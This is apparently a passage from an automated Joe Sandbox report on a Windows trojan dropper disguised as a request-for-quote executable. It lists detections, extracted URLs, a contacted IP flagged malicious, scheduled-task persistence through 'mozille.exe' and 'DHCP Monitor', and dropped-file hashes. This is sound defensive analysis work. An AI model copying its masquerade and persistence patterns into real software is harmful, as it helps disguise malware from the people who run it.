                  7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.12.unpack | 100% | Avira | TR/Dropper.Gen
                  7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.8.unpack | 100% | Avira | TR/Dropper.Gen

                  Domains

                  No Antivirus matches

                  URLs

                  Source | Detection | Scanner | Label
                  http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
                  http://micolous.id.au/projects/bf21 | 0% | Avira URL Cloud | safe
                  http://www.tiro.com | 0% | URL Reputation | safe
                  http://www.goodfont.co.kr | 0% | URL Reputation | safe
                  http://www.sajatypeworks.com | 0% | URL Reputation | safe
                  http://www.typography.netD | 0% | URL Reputation | safe
                  http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
                  http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
                  http://fontfabrik.com | 0% | URL Reputation | safe
                  http://www.totalbf2142.com/forums/showthread.php?t=5342 | 0% | Avira URL Cloud | safe
                  http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
                  http://micolous.id.au/projects/bf2142/. | 0% | Avira URL Cloud | safe
                  http://www.sandoll.co.kr | 0% | URL Reputation | safe
                  http://www.urwpp.deDPlease | 0% | URL Reputation | safe
                  http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
                  http://www.sakkal.com | 0% | URL Reputation | safe
                  http://micolous.id.au | 0% | Avira URL Cloud | safe
                  http://micolous.id.au/projects/bf2142/ | 0% | Avira URL Cloud | safe
                  http://igaeJZ.so | 0% | Avira URL Cloud | safe
                  http://www.pcgamingboards.com/smf/index.php?topic=129.msg279#msg279 | 0% | Avira URL Cloud | safe
                  http://www.carterandcone.coml | 0% | URL Reputation | safe
                  http://www.founder.com.cn/cn | 0% | URL Reputation | safe
                  http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
                  http://micolous.id.au/ | 0% | Avira URL Cloud | safe

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  URLs from Memory and Binaries

                  Name | Source | Malicious | Antivirus Detection | Reputation
                  http://www.fontbureau.com/designersG | RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | false | | high
                  http://igaeditor.sourceforge.net/wiki/ | mozille.exe | false | | high
                  http://ati.amd.com/developer/compressonator.html | mozille.exe | false | | high
                  http://www.fontbureau.com/designers/? | RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | false | | high
                  https://sourceforge.net/project/showfiles.php?group_id=181663Mhttp://igaeditor.sourceforge.net/wiki/ | RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000000.294283178.0000000000392000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000005.00000000.327586416.0000000000162000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.333928558.0000000000582000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.361685768.0000000003B04000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000000.362803086.0000000000262000.00000002.00020000.sdmp, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmp | false | | high
                  http://www.founder.com.cn/cn/bThe | RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://www.fontbureau.com/designers? | RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | false | | high
                  http://www.radgametools.com/bnkdown.htm | mozille.exe | false | | high
                  http://developer.nvidia.com/object/dds_thumbnail_viewer.html | mozille.exe | false | | high
                  http://micolous.id.au/projects/bf21 | mozille.exe | false | Avira URL Cloud: safe | unknown
                  http://www.tiro.com | RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://www.fontbureau.com/designers | RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | false | | high
                  http://www.goodfont.co.kr | RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://www.gimp.org/windows/ | mozille.exe, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmp | false | | high
                  http://www.sajatypeworks.com | RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://www.typography.netD | RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://www.founder.com.cn/cn/cThe | RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://fontfabrik.comRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.totalbf2142.com/forums/showthread.php?t=5342mozille.exefalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://sourceforge.net/svn/?group_id=181663mozille.exefalse
                                        high
                                        http://www.galapagosdesign.com/DPleaseRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://micolous.id.au/projects/bf2142/.RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000000.294283178.0000000000392000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000005.00000000.327586416.0000000000162000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.333928558.0000000000582000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.361685768.0000000003B04000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000000.362803086.0000000000262000.00000002.00020000.sdmp, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.fonts.comRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.sandoll.co.krRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.urwpp.deDPleaseRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.zhongyicts.com.cnRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.360806225.0000000002B36000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000002.393670309.0000000002651000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.572294732.00000000032C1000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.sakkal.comRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://micolous.id.aumozille.exe, 0000000F.00000002.575440695.00000000042C9000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://micolous.id.au/projects/bf2142/RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.341191488.0000000006C10000.00000004.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338715728.0000000003709000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000002.396925002.0000000006750000.00000004.00020000.sdmp, mozille.exe, 0000000E.00000002.394466512.0000000003659000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.575440695.00000000042C9000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.580953387.00000000078F0000.00000004.00020000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.apache.org/licenses/LICENSE-2.0RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.fontbureau.comRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                                high
                                                http://igaeditor.sourceforge.net/mozille.exe, mozille.exe, 0000000F.00000002.575440695.00000000042C9000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.580953387.00000000078F0000.00000004.00020000.sdmpfalse
                                                  high
                                                  http://igaeditor.sourceforge.net/latest.txtmozille.exe, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmpfalse
                                                    high
                                                    http://igaeJZ.soRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338715728.0000000003709000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000002.394466512.0000000003659000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.575440695.00000000042C9000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.pcgamingboards.com/smf/index.php?topic=129.msg279#msg279mozille.exe, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://igaeditor.sourceforge.net/ohttp://www.totalbf2142.com/forums/showthread.php?t=5342RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000000.294283178.0000000000392000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000005.00000000.327586416.0000000000162000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.333928558.0000000000582000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.361685768.0000000003B04000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000000.362803086.0000000000262000.00000002.00020000.sdmp, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmpfalse
                                                      high
                                                      http://www.carterandcone.comlRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers/cabarga.htmlNRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.founder.com.cn/cnRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers/frere-jones.htmlRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://registry.gimp.org/plugin?id=4816mozille.exefalse
                                                            high
                                                            http://www.jiyu-kobo.co.jp/RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://sourceforge.net/project/showfiles.php?group_id=181663mozille.exefalse
                                                              high
                                                              http://www.fontbureau.com/designers8RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmpfalse
                                                                high
                                                                http://developer.nvidia.com/object/photoshop_dds_plugins.htmlmozille.exefalse
                                                                  high
                                                                  http://developer.nvidia.com/object/photoshop_dds_plugins.htmlyhttp://developer.nvidia.com/object/ddsRFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000000.294283178.0000000000392000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000005.00000000.327586416.0000000000162000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.333928558.0000000000582000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.361685768.0000000003B04000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000000.362803086.0000000000262000.00000002.00020000.sdmp, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmpfalse
                                                                    high
                                                                    http://micolous.id.au/RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.341191488.0000000006C10000.00000004.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338715728.0000000003709000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000002.396925002.0000000006750000.00000004.00020000.sdmp, mozille.exe, 0000000E.00000002.394466512.0000000003659000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.575440695.00000000042C9000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.580953387.00000000078F0000.00000004.00020000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown

                                                                    Contacted IPs


                                                                    Public

IP             Domain   Country         Flag  ASN   ASN Name  Malicious
89.238.150.43  unknown  United Kingdom        9009  M247GB    true

                                                                    General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 551470
Start date: 12.01.2022
Start time: 09:01:01
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 14m 8s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: RFQ_GGMC-Ref 12-01-2022.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 46
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@53/16@0/1
                                                                    EGA Information:
                                                                    • Successful, ratio: 60%
                                                                    HDC Information:
                                                                    • Successful, ratio: 0.2% (good quality ratio 0%)
                                                                    • Quality average: 12.9%
                                                                    • Quality standard deviation: 33.5%
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 0
                                                                    • Number of non-executed functions: 0
                                                                    Cookbook Comments:
                                                                    • Adjust boot time
                                                                    • Enable AMSI
                                                                    • Found application associated with file extension: .exe
                                                                    Warnings:
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                    • TCP Packets have been reduced to 100
                                                                    • Excluded IPs from analysis (whitelisted): 173.222.108.210, 173.222.108.147, 173.222.108.226
                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, wu-shim.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net
                                                                    • Execution Graph export aborted for target RFQ_GGMC-Ref 12-01-2022.exe, PID 6948 because it is empty
• Execution Graph export aborted for target RFQ_GGMC-Ref 12-01-2022.exe, PID 7000 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
                                                                    • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                    Simulations

                                                                    Behavior and APIs

Time      Type             Description
09:02:09  API Interceptor  1x Sleep call for process: RFQ_GGMC-Ref 12-01-2022.exe modified
09:02:13  API Interceptor  138x Sleep call for process: powershell.exe modified
09:02:31  Task Scheduler   Run new task: mozille path: "C:\Users\user\AppData\Local\Temp\mozille.exe"
09:02:37  API Interceptor  4x Sleep call for process: mozille.exe modified
09:03:24  API Interceptor  164x Sleep call for process: jzhlgt.exe modified
09:03:41  API Interceptor  33x Sleep call for process: dlliok.exe modified
09:03:59  Task Scheduler   Run new task: DHCP Monitor path: "C:\Users\user\AppData\Local\Temp\dlliok.exe" s>$(Arg0)

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    No context

                                                                    Domains

                                                                    No context

                                                                    ASN

                                                                    No context

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ_GGMC-Ref 12-01-2022.exe.log
Process: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
File Type: ASCII text, with CRLF line terminators
Category: modified
Size (bytes): 1310
Entropy (8bit): 5.345651901398759
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
MD5: D918C6A765EDB90D2A227FE23A3FEC98
SHA1: 8BA802AD8D740F114783F0DADC407CBFD2A209B3
SHA-256: AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
SHA-512: A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
Malicious: true
Reputation: unknown
                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mozille.exe.log
Process: C:\Users\user\AppData\Local\Temp\mozille.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1310
Entropy (8bit): 5.345651901398759
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
MD5: D918C6A765EDB90D2A227FE23A3FEC98
SHA1: 8BA802AD8D740F114783F0DADC407CBFD2A209B3
SHA-256: AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
SHA-512: A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
Malicious: false
Reputation: unknown
                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 21704
Entropy (8bit): 5.597528400509029
Encrypted: false
SSDEEP: 384:/tL67waWub8VWzZPWCDzj8eNSBKnsjultIW8aepEQt11u16z+5mHKHVg3P8j6Ivv:4CubLz5FfN4KsClt8a+f13+U+WEmlc
MD5: 2F13EF84B063265B6634CB005F4B5286
SHA1: 0AA0F7DC07BD5D1A12DAE304E40B70755A3F164A
SHA-256: 638143E39E07AD1C5DAF1BE1FB96B03C42B543B790849C7716AC2AC6718F667E
SHA-512: 9CBD81D15290642E4853B32BAAC634395AAC24B40279E8D24C33715EDA4161FE45580BA39C97CC8295B2CE312E97251795542323795ED32F74F9774B7E0CC4AD
Malicious: false
Reputation: unknown
                                                                    Preview: @...e.....................u.P.E.B... .l..............@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)f.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,j.....(.Microsoft.PowerShell.Commands.ManagementT................7.,.fiD..............*.Microsoft.Management.Inf
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2x3ucvgo.4eb.ps1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Reputation: unknown
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cfrruvyb.luy.psm1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svjneimu.gkz.ps1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wqgzyu5l.f34.psm1
                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: 1
                                                                    C:\Users\user\AppData\Local\Temp\mozille.exe
                                                                    Process:C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):567808
                                                                    Entropy (8bit):7.627302244469304
                                                                    Encrypted:false
                                                                    SSDEEP:12288:3v5+Ky22SH/s6TYnPEvvslosxkhoNB3Ps7hZJ:/029/enPEHkowNB/S
                                                                    MD5:9FD45110BAD75CDA6DE67232014AEB6E
                                                                    SHA1:A43016FA816AFD1693FB7F266DD032FD7F061C35
                                                                    SHA-256:B586CA95BA9557F7AD2434D01F96FF191B77541670894DF3B78AA3A8312AE092
                                                                    SHA-512:0B87028C9E9654BC3FC69797E9B241604C1A6266DF388E8E01CCE98F19507F5544B35AFD02462E2229D4F4C9B8D348AB9A0294B1802F98D6F80F608657BC7675
                                                                    Malicious:true
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2.a................................. ........@.. ....................... ............@....................................K.......T............................................................................ ............... ..H............text...4.... ...................... ..`.sdata..............................@....rsrc...T...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\tmp71CD.tmp
                                                                    Process:C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                                                                    File Type:XML 1.0 document, ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):1600
                                                                    Entropy (8bit):5.151412589996552
                                                                    Encrypted:false
                                                                    SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtXxvn:cge4MYrFdOFzOzN33ODOiDdKrsuThv
                                                                    MD5:C286A082609C1C1A219FF01B51775164
                                                                    SHA1:F8A15ACBF3A55AD917F35566777A6EC4731DE800
                                                                    SHA-256:8ED2C4AF8E80335DE493A0A74226839E5505BA01BFD742C9A56A296878D9D636
                                                                    SHA-512:2FD055314D57E399D6CBB5FAFC7B98AD0910AD3D82F01A531C08EE36E8384FF1B86A6656741AE4C0E59E818EFFB92398BDF54ED7DADB7D0AA911982AA211A9E5
                                                                    Malicious:true
                                                                    Reputation:unknown
